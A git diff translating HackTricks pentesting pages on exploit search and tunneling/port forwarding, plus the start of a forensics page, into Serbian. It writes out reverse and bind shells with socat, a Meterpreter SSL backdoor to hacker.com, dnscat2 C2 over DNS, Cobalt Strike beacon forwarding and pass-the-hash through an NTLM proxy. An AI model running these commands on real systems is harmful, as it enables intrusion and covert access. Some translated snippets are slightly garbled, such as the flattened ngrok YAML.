 searchsploit -x 7618[.c] #Open vi to inspect the exploit
 searchsploit --nmap file.xml #Search vulns inside an nmap xml result
 ```
-
 ### Pompem
 
-[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits
+[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) je još jedan alat za pretragu eksploitacija
 
 ### MSF-Search
-
 ```bash
 msf> search platform:windows port:135 target:XP type:exploit
 ```
-
 ### PacketStorm
 
-If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com)
+Ako ništa nije pronađeno, pokušajte da pretražite korišćenu tehnologiju unutar [https://packetstormsecurity.com/](https://packetstormsecurity.com)
 
 ### Vulners
 
-You can also search in vulners database: [https://vulners.com/](https://vulners.com)
+Takođe možete pretraživati u vulners bazi podataka: [https://vulners.com/](https://vulners.com)
 
 ### Sploitus
 
-This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
+Ovo pretražuje exploite u drugim bazama podataka: [https://sploitus.com/](https://sploitus.com)
 
 ### Sploitify
 
-GTFOBins-like curated list of exploits with filters by vulnerability type (Local Privilege Escalation, Remote Code execution, etc), service type (Web, SMB, SSH, RDP, etc), OS and practice labs (links to machines where you can play with sploits): [https://sploitify.haxx.it](https://sploitify.haxx.it)
+GTFOBins-slična kurirana lista exploit-a sa filtrima po tipu ranjivosti (Lokalna eskalacija privilegija, Daljinsko izvršavanje koda, itd), tipu usluge (Web, SMB, SSH, RDP, itd), OS i praktičnim laboratorijama (linkovi ka mašinama gde možete igrati sa exploit-ima): [https://sploitify.haxx.it](https://sploitify.haxx.it)
 
 ### search_vulns
 
-search_vulns enables you to search for known vulnerabilities and exploits as well: [**https://search-vulns.com/**](https://search-vulns.com/). It utilizes various data sources like the NVD, the Exploit-DB, PoC-in-GitHub, the GitHub Security Advisory database and endoflife.date.
+search_vulns vam omogućava da pretražujete poznate ranjivosti i exploite: [**https://search-vulns.com/**](https://search-vulns.com/). Koristi različite izvore podataka kao što su NVD, Exploit-DB, PoC-u-GitHub, GitHub Security Advisory baza podataka i endoflife.date.
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/generic-hacking/tunneling-and-port-forwarding.md b/src/generic-hacking/tunneling-and-port-forwarding.md
index 902da0e5b..bee6ba9d6 100644
--- a/src/generic-hacking/tunneling-and-port-forwarding.md
+++ b/src/generic-hacking/tunneling-and-port-forwarding.md
@@ -5,12 +5,11 @@
 ## Nmap tip
 
 > [!WARNING]
-> **ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work.
+> **ICMP** i **SYN** skeniranja ne mogu se tunelovati kroz socks proksije, pa moramo **onemogućiti ping otkrivanje** (`-Pn`) i odrediti **TCP skeniranja** (`-sT`) da bi ovo radilo.
 
 ## **Bash**
 
 **Host -> Jump -> InternalA -> InternalB**
-
 ```bash
 # On the jump server connect the port 3333 to the 5985
 mknod backpipe p;
@@ -26,19 +25,15 @@ cat <&4 >&3 &
 # From the host, you can now access InternalB from the Jump server
 evil-winrm -u username -i Jump
 ```
-
 ## **SSH**
 
-SSH graphical connection (X)
-
+SSH grafička veza (X)
 ```bash
 ssh -Y -C @ #-Y is less secure but faster than -X
 ```
-
 ### Local Port2Port
 
-Open new Port in SSH Server --> Other port
-
+Otvorite novi port na SSH serveru --> Drugi port
 ```bash
 ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere
 ```
@@ -46,29 +41,23 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in
 ```bash
 ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere
 ```
-
 ### Port2Port
 
-Local port --> Compromised host (SSH) --> Third_box:Port
-
+Lokalni port --> Kompromitovana mašina (SSH) --> Treća_mašina:Port
 ```bash
 ssh -i ssh_key @ -L :: [-p ] [-N -f]  #This way the terminal is still in your host
 #Example
 sudo ssh -L 631::631 -N -f -l  
 ```
-
 ### Port2hostnet (proxychains)
 
-Local Port --> Compromised host (SSH) --> Wherever
-
+Lokalni port --> Kompromitovani host (SSH) --> Gde god
 ```bash
 ssh -f -N -D  @ #All sent to local port will exit through the compromised server (use as proxy)
 ```
+### Obrnuto prosleđivanje portova
 
-### Reverse Port Forwarding
-
-This is useful to get reverse shells from internal hosts through a DMZ to your host:
-
+Ovo je korisno za dobijanje obrnuto shell-ova sa internih hostova kroz DMZ do vašeg hosta:
 ```bash
 ssh -i dmz_key -R :443:0.0.0.0:7000 root@10.129.203.111 -vN
 # Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000
@@ -77,13 +66,11 @@ ssh -i dmz_key -R :443:0.0.0.0:7000 root@10.129.203.111 -vN
 # and change the line "GatewayPorts no" to "GatewayPorts yes"
 # to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
 ```
-
 ### VPN-Tunnel
 
-You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\
+Potrebni su vam **root na oba uređaja** (jer ćete kreirati nove interfejse) i sshd konfiguracija mora dozvoliti root prijavu:\
 `PermitRootLogin yes`\
 `PermitTunnel yes`
-
 ```bash
 ssh root@server -w any:any #This will create Tun interfaces in both devices
 ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP
@@ -91,50 +78,38 @@ ifconfig tun0 up #Activate the client side network interface
 ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP
 ifconfig tun0 up #Activate the server side network interface
 ```
-
-Enable forwarding on the Server side
-
+Omogućite prosleđivanje na strani servera
 ```bash
 echo 1 > /proc/sys/net/ipv4/ip_forward
 iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
 ```
-
-Set a new route on the client side
-
+Postavite novu rutu na klijentskoj strani
 ```
 route add -net 10.0.0.0/16 gw 1.1.1.1
 ```
-
 ## SSHUTTLE
 
-You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\
-For example, forwarding all the traffic going to 10.10.10.0/24
-
+Možete **tunelovati** putem **ssh** sav **saobraćaj** ka **podmreži** kroz host.\
+Na primer, proslediti sav saobraćaj koji ide ka 10.10.10.0/24
 ```bash
 pip install sshuttle
 sshuttle -r user@host 10.10.10.10/24
 ```
-
-Connect with a private key
-
+Povežite se sa privatnim ključem
 ```bash
 sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa'
 # -D : Daemon mode
 ```
-
 ## Meterpreter
 
 ### Port2Port
 
-Local port --> Compromised host (active session) --> Third_box:Port
-
+Lokalni port --> Kompromitovani host (aktivna sesija) --> Treća_kutija:Port
 ```bash
 # Inside a meterpreter session
 portfwd add -l  -p  -r 
 ```
-
 ### SOCKS
-
 ```bash
 background# meterpreter session
 route add    # (ex: route add 10.10.10.14 255.255.255.0 8)
@@ -142,9 +117,7 @@ use auxiliary/server/socks_proxy
 run #Proxy port 1080 by default
 echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
 ```
-
-Another way:
-
+Još jedan način:
 ```bash
 background #meterpreter session
 use post/multi/manage/autoroute
@@ -157,13 +130,11 @@ set VERSION 4a
 run #Proxy port 1080 by default
 echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
 ```
-
 ## Cobalt Strike
 
 ### SOCKS proxy
 
-Open a port in the teamserver listening in all the interfaces that can be used to **route the traffic through the beacon**.
-
+Otvorite port na teamserveru koji sluša na svim interfejsima koji se mogu koristiti za **usmeravanje saobraćaja kroz beacon**.
 ```bash
 beacon> socks 1080
 [+] started SOCKS4a server on: 1080
@@ -171,50 +142,42 @@ beacon> socks 1080
 # Set port 1080 as proxy server in proxychains.conf
 proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
 ```
-
 ### rPort2Port
 
 > [!WARNING]
-> In this case, the **port is opened in the beacon host**, not in the Team Server and the traffic is sent to the Team Server and from there to the indicated host:port
-
+> U ovom slučaju, **port je otvoren na beacon hostu**, a ne na Team Serveru, a saobraćaj se šalje na Team Server i odatle na navedeni host:port
 ```bash
 rportfwd [bind port] [forward host] [forward port]
 rportfwd stop [bind port]
 ```
+Da se napomene:
 
-To note:
+- Beaconov obrnuti port forwarding je dizajniran da **tuneluje saobraćaj ka Team Server-u, a ne za preusmeravanje između pojedinačnih mašina**.
+- Saobraćaj je **tunelovan unutar Beaconovog C2 saobraćaja**, uključujući P2P linkove.
+- **Administratorske privilegije nisu potrebne** za kreiranje obrnuti port forward-a na visokim portovima.
 
-- Beacon's reverse port forward is designed to **tunnel traffic to the Team Server, not for relaying between individual machines**.
-- Traffic is **tunneled within Beacon's C2 traffic**, including P2P links.
-- **Admin privileges are not required** to create reverse port forwards on high ports.
-
-### rPort2Port local
+### rPort2Port lokalno
 
 > [!WARNING]
-> In this case, the **port is opened in the beacon host**, not in the Team Server and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port
-
+> U ovom slučaju, **port je otvoren na beacon host-u**, a ne na Team Server-u i **saobraćaj se šalje Cobalt Strike klijentu** (ne na Team Server) i odatle na navedeni host:port
 ```
 rportfwd_local [bind port] [forward host] [forward port]
 rportfwd_local stop [bind port]
 ```
-
 ## reGeorg
 
 [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
 
-You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp
-
+Morate da otpremite web fajl tunel: ashx|aspx|js|jsp|php|php|jsp
 ```bash
 python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
 ```
-
 ## Chisel
 
-You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
-You need to use the **same version for client and server**
+Možete ga preuzeti sa stranice za izdanja [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
+Morate koristiti **istu verziju za klijenta i server**
 
 ### socks
-
 ```bash
 ./chisel server -p 8080 --reverse #Server -- Attacker
 ./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
@@ -223,22 +186,18 @@ You need to use the **same version for client and server**
 ./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
 ./chisel client -v 10.10.10.10:8080 socks #Attacker
 ```
-
-### Port forwarding
-
+### Prosleđivanje portova
 ```bash
 ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
 ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
 ```
-
 ## Ligolo-ng
 
 [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng)
 
-**Use the same version for agent and proxy**
+**Koristite istu verziju za agenta i proxy**
 
 ### Tunneling
-
 ```bash
 # Start proxy server and automatically generate self-signed TLS certificates -- Attacker
 sudo ./proxy -selfcert
@@ -260,9 +219,7 @@ interface_add_route --name "ligolo" --route / python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
 ```
@@ -293,9 +246,7 @@ attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127
 ```bash
 victim> python client.py --server-ip  --server-port 9999
 ```
-
-Pivot through **NTLM proxy**
-
+Pivotiranje kroz **NTLM proxy**
 ```bash
 victim> python client.py --server-ip  --server-port 9999 --ntlm-proxy-ip  --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd
 ```
@@ -303,39 +254,29 @@ victim> python client.py --server-ip  --server-port 9999 --ntl
 ```bash
 victim> python client.py --server-ip  --server-port 9999 --ntlm-proxy-ip  --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
 ```
-
 ## **Socat**
 
 [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
 
 ### Bind shell
-
 ```bash
 victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
 attacker> socat FILE:`tty`,raw,echo=0 TCP4::1337
 ```
-
-### Reverse shell
-
+### Obrnuta ljuska
 ```bash
 attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane
 ```
-
 ### Port2Port
-
 ```bash
 socat TCP4-LISTEN:,fork TCP4:: &
 ```
-
-### Port2Port through socks
-
+### Port2Port preko socks
 ```bash
 socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
 ```
-
-### Meterpreter through SSL Socat
-
+### Meterpreter preko SSL Socat
 ```bash
 #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
 attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333
@@ -345,21 +286,17 @@ attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,f
 victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
 #Execute the meterpreter
 ```
-
-You can bypass a **non-authenticated proxy** executing this line instead of the last one in the victim's console:
-
+Možete zaobići **neautentifikovani proxy** izvršavanjem ove linije umesto poslednje u konzoli žrtve:
 ```bash
 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5
 ```
-
 [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/)
 
-### SSL Socat Tunnel
+### SSL Socat Tuner
 
-**/bin/sh console**
-
-Create certificates on both sides: Client and Server
+**/bin/sh konzola**
 
+Kreirajte sertifikate na obe strane: Klijent i Server
 ```bash
 # Execute these commands on both sides
 FILENAME=socatssl
@@ -373,34 +310,28 @@ chmod 600 $FILENAME.key $FILENAME.pem
 attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh
 victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
 ```
-
 ### Remote Port2Port
 
-Connect the local SSH port (22) to the 443 port of the attacker host
-
+Povežite lokalni SSH port (22) sa 443 portom napadačkog hosta
 ```bash
 attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
 victim> while true; do socat TCP4::443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
 attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim
 ```
-
 ## Plink.exe
 
-It's like a console PuTTY version ( the options are very similar to an ssh client).
-
-As this binary will be executed in the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward only locally accessible port to a port in our machine:
+To je kao konzolna verzija PuTTY-a (opcije su vrlo slične ssh klijentu).
 
+Pošto će ova binarna datoteka biti izvršena na žrtvi i to je ssh klijent, potrebno je da otvorimo naš ssh servis i port kako bismo imali obrnutu vezu. Zatim, da bismo prosledili samo lokalno dostupni port na port na našoj mašini:
 ```bash
 echo y | plink.exe -l  -pw  [-p ] -R :: 
 echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
 ```
-
 ## Windows netsh
 
 ### Port2Port
 
-You need to be a local admin (for any port)
-
+Morate biti lokalni administrator (za bilo koji port)
 ```bash
 netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
 # Example:
@@ -410,60 +341,50 @@ netsh interface portproxy show v4tov4
 # Delete port forward
 netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
 ```
-
 ## SocksOverRDP & Proxifier
 
-You need to have **RDP access over the system**.\
-Download:
+Morate imati **RDP pristup preko sistema**.\
+Preuzmite:
 
-1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
+1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - Ovaj alat koristi `Dynamic Virtual Channels` (`DVC`) iz funkcije Remote Desktop Service u Windows-u. DVC je odgovoran za **tunelovanje paketa preko RDP veze**.
 2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
 
-In your client computer load **`SocksOverRDP-Plugin.dll`** like this:
-
+Na vašem klijentskom računaru učitajte **`SocksOverRDP-Plugin.dll`** na sledeći način:
 ```bash
 # Load SocksOverRDP.dll using regsvr32.exe
 C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
 ```
+Sada možemo **povezati** se sa **žrtvom** preko **RDP** koristeći **`mstsc.exe`**, i trebali bismo primiti **poruku** koja kaže da je **SocksOverRDP plugin omogućen**, i da će **slušati** na **127.0.0.1:1080**.
 
-Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**.
-
-**Connect** via **RDP** and upload & execute in the victim machine the `SocksOverRDP-Server.exe` binary:
-
+**Povežite** se putem **RDP** i otpremite & izvršite na mašini žrtve `SocksOverRDP-Server.exe` binarni fajl:
 ```
 C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
 ```
-
-Now, confirm in you machine (attacker) that the port 1080 is listening:
-
+Sada, potvrdite na vašem računaru (napadaču) da port 1080 sluša:
 ```
 netstat -antb | findstr 1080
 ```
+Sada možete koristiti [**Proxifier**](https://www.proxifier.com/) **da proksirate saobraćaj kroz tu port.**
 
-Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
+## Proksiranje Windows GUI aplikacija
 
-## Proxify Windows GUI Apps
+Možete naterati Windows GUI aplikacije da prolaze kroz proksi koristeći [**Proxifier**](https://www.proxifier.com/).\
+U **Profile -> Proxy Servers** dodajte IP adresu i port SOCKS servera.\
+U **Profile -> Proxification Rules** dodajte ime programa koji želite da proksirate i veze ka IP adresama koje želite da proksirate.
 
-You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
-In **Profile -> Proxy Servers** add the IP and port of the SOCKS server.\
-In **Profile -> Proxification Rules** add the name of the program to proxify and the connections to the IPs you want to proxify.
-
-## NTLM proxy bypass
-
-The previously mentioned tool: **Rpivot**\
-**OpenVPN** can also bypass it, setting these options in the configuration file:
+## NTLM proksi zaobilaženje
 
+Prethodno pomenuti alat: **Rpivot**\
+**OpenVPN** takođe može da ga zaobiđe, postavljajući ove opcije u konfiguracionom fajlu:
 ```bash
 http-proxy  8080  ntlm
 ```
-
 ### Cntlm
 
 [http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/)
 
-It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\
-For example that forward port 443
-
+Ova alatka se autentifikuje protiv proksija i vezuje lokalni port koji se prosleđuje eksternoj usluzi koju odredite. Zatim možete koristiti alat po vašem izboru preko ovog porta.\
+Na primer, prosledite port 443.
 ```
 Username Alice
 Password P@ssw0rd
@@ -471,13 +392,12 @@ Domain CONTOSO.COM
 Proxy 10.0.0.10:8080
 Tunnel 2222::443
 ```
-
-Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\
-You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
+Sada, ako na primer postavite **SSH** servis na žrtvi da sluša na portu 443. Možete se povezati na njega preko napadačkog porta 2222.\
+Takođe možete koristiti **meterpreter** koji se povezuje na localhost:443, a napadač sluša na portu 2222.
 
 ## YARP
 
-A reverse proxy created by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
+Obrnuti proxy koji je kreirao Microsoft. Možete ga pronaći ovde: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
 
 ## DNS Tunneling
 
@@ -485,26 +405,21 @@ A reverse proxy created by Microsoft. You can find it here: [https://github.com/
 
 [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
 
-Root is needed in both systems to create tun adapters and tunnel data between them using DNS queries.
-
+Root je potreban na oba sistema da bi se kreirali tun adapteri i tunelovali podaci između njih koristeći DNS upite.
 ```
 attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
 victim> iodine -f -P P@ssw0rd tunneldomain.com -r
 #You can see the victim at 1.1.1.2
 ```
-
-The tunnel will be very slow. You can create a compressed SSH connection through this tunnel by using:
-
+Tunel će biti veoma spor. Možete kreirati kompresovanu SSH vezu kroz ovaj tunel koristeći:
 ```
 ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
 ```
-
 ### DNSCat2
 
-[**Download it from here**](https://github.com/iagox86/dnscat2)**.**
-
-Establishes a C\&C channel through DNS. It doesn't need root privileges.
+[**Preuzmite ga ovde**](https://github.com/iagox86/dnscat2)**.**
 
+Uspostavlja C\&C kanal putem DNS-a. Ne zahteva root privilegije.
 ```bash
 attacker> ruby ./dnscat2.rb tunneldomain.com
 victim> ./dnscat2 tunneldomain.com
@@ -513,28 +428,23 @@ victim> ./dnscat2 tunneldomain.com
 attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
 victim> ./dnscat2 --dns host=10.10.10.10,port=5353
 ```
+#### **U PowerShell-u**
 
-#### **In PowerShell**
-
-You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
-
+Možete koristiti [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) da pokrenete dnscat2 klijent u powershell-u:
 ```
 Import-Module .\dnscat2.ps1
 Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
 ```
-
-#### **Port forwarding with dnscat**
-
+#### **Prosleđivanje portova sa dnscat**
 ```bash
 session -i 
 listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
 ```
+#### Promena proxychains DNS
 
-#### Change proxychains DNS
+Proxychains presreće `gethostbyname` libc poziv i tuneluje tcp DNS zahtev kroz socks proxy. Po **defaultu** DNS server koji proxychains koristi je **4.2.2.2** (hardkodiran). Da biste ga promenili, uredite datoteku: _/usr/lib/proxychains3/proxyresolv_ i promenite IP. Ako ste u **Windows okruženju**, možete postaviti IP **domen kontrolera**.
 
-Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
-
-## Tunnels in Go
+## Tunneli u Go
 
 [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
 
@@ -545,18 +455,15 @@ Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request thr
 [https://github.com/friedrich/hans](https://github.com/friedrich/hans)\
 [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
 
-Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests.
-
+Root je potreban u oba sistema da bi se kreirali tun adapteri i tunelovali podaci između njih koristeći ICMP echo zahteve.
 ```bash
 ./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
 ./hans -f -c  -p P@ssw0rd -v
 ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
 ```
-
 ### ptunnel-ng
 
-[**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
-
+[**Preuzmite ga ovde**](https://github.com/utoni/ptunnel-ng.git).
 ```bash
 # Generate it
 sudo ./autogen.sh
@@ -570,32 +477,28 @@ ssh -p 2222 -l user 127.0.0.1
 # Create a socks proxy through the SSH connection through the ICMP tunnel
 ssh -D 9050 -p 2222 -l user 127.0.0.1
 ```
-
 ## ngrok
 
-[**ngrok**](https://ngrok.com/) **is a tool to expose solutions to Internet in one command line.**\
-&#xNAN;_Exposition URI are like:_ **UID.ngrok.io**
+[**ngrok**](https://ngrok.com/) **je alat za izlaganje rešenja internetu u jednoj komandnoj liniji.**\
+&#xNAN;_Exposition URI su kao:_ **UID.ngrok.io**
 
-### Installation
-
-- Create an account: https://ngrok.com/signup
-- Client download:
+### Instalacija
 
+- Napravite nalog: https://ngrok.com/signup
+- Preuzimanje klijenta:
 ```bash
 tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
 chmod a+x ./ngrok
 # Init configuration, with your token
 ./ngrok config edit
 ```
+### Osnovne upotrebe
 
-### Basic usages
+**Dokumentacija:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/).
 
-**Documentation:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/).
-
-_It is also possible to add authentication and TLS, if necessary._
+_ Takođe je moguće dodati autentifikaciju i TLS, ako je potrebno._
 
 #### Tunneling TCP
-
 ```bash
 # Pointing to 0.0.0.0:4444
 ./ngrok tcp 4444
@@ -603,49 +506,42 @@ _It is also possible to add authentication and TLS, if necessary._
 # Listen (example): nc -nvlp 4444
 # Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345
 ```
-
-#### Exposing files with HTTP
-
+#### Izlaganje fajlova putem HTTP-a
 ```bash
 ./ngrok http file:///tmp/httpbin/
 # Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
 ```
-
 #### Sniffing HTTP calls
 
-_Useful for XSS,SSRF,SSTI ..._\
-Directly from stdout or in the HTTP interface [http://127.0.0.1:4040](http://127.0.0.1:4000).
+_Korisno za XSS, SSRF, SSTI ..._\
+Direktno iz stdout-a ili u HTTP interfejsu [http://127.0.0.1:4040](http://127.0.0.1:4000).
 
 #### Tunneling internal HTTP service
-
 ```bash
 ./ngrok http localhost:8080 --host-header=rewrite
 # Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
 # With basic auth
 ./ngrok http localhost:8080 --host-header=rewrite --auth="myuser:mysuperpassword"
 ```
+#### ngrok.yaml jednostavan primer konfiguracije
 
-#### ngrok.yaml simple configuration example
-
-It opens 3 tunnels:
+Otvara 3 tunela:
 
 - 2 TCP
-- 1 HTTP with static files exposition from /tmp/httpbin/
-
+- 1 HTTP sa izlaganjem statičkih fajlova iz /tmp/httpbin/
 ```yaml
 tunnels:
-  mytcp:
-    addr: 4444
-    proto: tcptunne
-  anothertcp:
-    addr: 5555
-    proto: tcp
-  httpstatic:
-    proto: http
-    addr: file:///tmp/httpbin/
+mytcp:
+addr: 4444
+proto: tcptunne
+anothertcp:
+addr: 5555
+proto: tcp
+httpstatic:
+proto: http
+addr: file:///tmp/httpbin/
 ```
-
-## Other tools to check
+## Ostali alati za proveru
 
 - [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
 - [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md
index e725dfa85..9fc9de28f 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md
@@ -1,30 +1,30 @@
-# Basic Forensic Methodology
+# Osnovna Forenzička Metodologija
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Creating and Mounting an Image
+## Kreiranje i Montiranje Slike
 
 {{#ref}}
 ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
 {{#endref}}
 
-## Malware Analysis
+## Analiza Malvera
 
-This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
+Ovo **nije nužno prvi korak koji treba preduzeti kada imate sliku**. Ali možete koristiti ove tehnike analize malvera nezavisno ako imate datoteku, sliku datotečnog sistema, sliku memorije, pcap... tako da je dobro **imati ove akcije na umu**:
 
 {{#ref}}
 malware-analysis.md
 {{#endref}}
 
-## Inspecting an Image
+## Istraživanje Slike
 
-if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
+Ako dobijete **forenzičku sliku** uređaja, možete početi **analizirati particije, datotečni sistem** koji se koristi i **oporaviti** potencijalno **zanimljive datoteke** (čak i obrisane). Saznajte kako u:
 
 {{#ref}}
 partitions-file-systems-carving/
 {{#endref}}
 
-Depending on the used OSs and even platform different interesting artifacts should be searched:
+U zavisnosti od korišćenih OS-ova i čak platformi, različiti zanimljivi artefakti treba da se pretražuju:
 
 {{#ref}}
 windows-forensics/
@@ -38,42 +38,42 @@ linux-forensics.md
 docker-forensics.md
 {{#endref}}
 
